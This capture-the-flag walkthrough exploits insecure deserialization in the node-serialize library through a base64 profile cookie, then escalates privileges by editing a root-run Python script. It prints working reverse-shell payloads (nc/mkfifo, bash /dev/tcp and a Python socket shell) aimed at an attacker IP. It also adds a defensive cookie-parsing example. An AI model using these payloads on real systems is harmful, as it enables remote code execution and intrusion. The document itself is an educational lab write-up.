
Celestial

Port scan

$ sudo nmap 10.10.10.85 -p- --min-rate=10000 -T4 -sCV

PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

http://10.10.10.85:3000/


Base64-decode the profile cookie

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}

Insecure deserialization in Node.js

Serialization is the process of converting an object into a stream of bytes to store the object or transmit it to memory, a database, or a file. Its main purpose is to save the state of an object in order to be able to recreate it when needed. The reverse process is called deserialization.

Insecure Deserialization in Node.js

serialize.js

var serialize = require('node-serialize');

x = {
test : function(){
  require('child_process').execSync("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f", function puts(error, stdout, stderr) {});
}
};

console.log("Serialized: \n" + serialize.serialize(x));

/*
Append () after the function's closing bracket in the serialized output,
so that unserialize() invokes the function immediately (IIFE) instead of
only reconstructing it.
*/
$ python -m venv .venv
$ source ./.venv/bin/activate

$ sudo apt-get update

$ sudo apt install nodejs
$ sudo apt install npm
$ npm install node-serialize

$ node serialize.js
{"test":"_$$ND_FUNC$$_function(){\n  require('child_process').execSync(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 4444 >/tmp/f\", function puts(error, stdout, stderr) {});\n}"}

{"username":"_$$ND_FUNC$$_function(){\n  require('child_process').execSync(\"bash -c 'bash -i >& /dev/tcp/10.10.16.2/4444 0>&1'\", function puts(error, stdout, stderr) {});\n}()","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}

Base64-encode the data and replace the value of the profile cookie
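The reason the cookie is exploitable is that node-serialize's unserialize() turns any string starting with _$$ND_FUNC$$_ back into a live function, and the trailing () runs it during parsing. As an added defender-side example (not code from the writeup or from the application), the following handler parses the same profile cookie with JSON.parse, which can never materialise a function, enforces an allow-list of string fields, and flags the marker for logging; the cookie values and field list are constructed from the profile shown above.

```javascript
// Added example: safe handling of the base64 profile cookie.
// The real fix is to never call node-serialize's unserialize() on
// untrusted input; the marker check is defence in depth for detection.
const ALLOWED_FIELDS = ['username', 'country', 'city', 'num']; // from the cookie above
const FUNC_MARKER = '_$$ND_FUNC$$_'; // prefix node-serialize rehydrates into a function

// Detection helper: true if a decoded cookie carries a serialized function.
function containsFunctionMarker(text) {
  return text.includes(FUNC_MARKER);
}

// Returns { ok: true, profile } or { ok: false, reason }.
function parseProfileCookie(cookieValue) {
  const decoded = Buffer.from(cookieValue, 'base64').toString('utf8');
  if (containsFunctionMarker(decoded)) {
    return { ok: false, reason: 'serialized function marker present' };
  }
  let obj;
  try {
    obj = JSON.parse(decoded); // plain JSON: strings stay strings
  } catch (e) {
    return { ok: false, reason: 'invalid JSON' };
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) {
    return { ok: false, reason: 'not an object' };
  }
  const profile = {};
  for (const key of Object.keys(obj)) {
    if (!ALLOWED_FIELDS.includes(key)) return { ok: false, reason: 'unexpected field ' + key };
    if (typeof obj[key] !== 'string') return { ok: false, reason: 'field is not a string: ' + key };
    profile[key] = obj[key];
  }
  for (const key of ALLOWED_FIELDS) {
    if (!(key in profile)) return { ok: false, reason: 'missing field ' + key };
  }
  return { ok: true, profile };
}

// Constructed sample cookies (not captured from the box).
const BENIGN_COOKIE = Buffer.from(JSON.stringify({
  username: 'Dummy', country: 'Idk Probably Somewhere Dumb', city: 'Lametown', num: '2',
})).toString('base64');
const MARKER_COOKIE = Buffer.from(
  '{"username":"_$$ND_FUNC$$_function(){ return 1 }()","country":"x","city":"y","num":"2"}'
).toString('base64');

console.log(parseProfileCookie(BENIGN_COOKIE)); // ok: true, profile with four fields
console.log(parseProfileCookie(MARKER_COOKIE)); // ok: false, marker rejected before parsing
```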


User sun

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

$ find / -type f -writable 2>/dev/null | grep -Ev '^(/proc|/sys|/snap|/boot|/var|/run|/dev|/opt|/etc|/usr/lib|/usr/s?bin|/usr/share/)'

/home/sun/Documents/script.py


output.txt is owned by root, and its contents come from script.py, which we can modify. So edit the script and put a Python reverse shell inside.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.2",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")
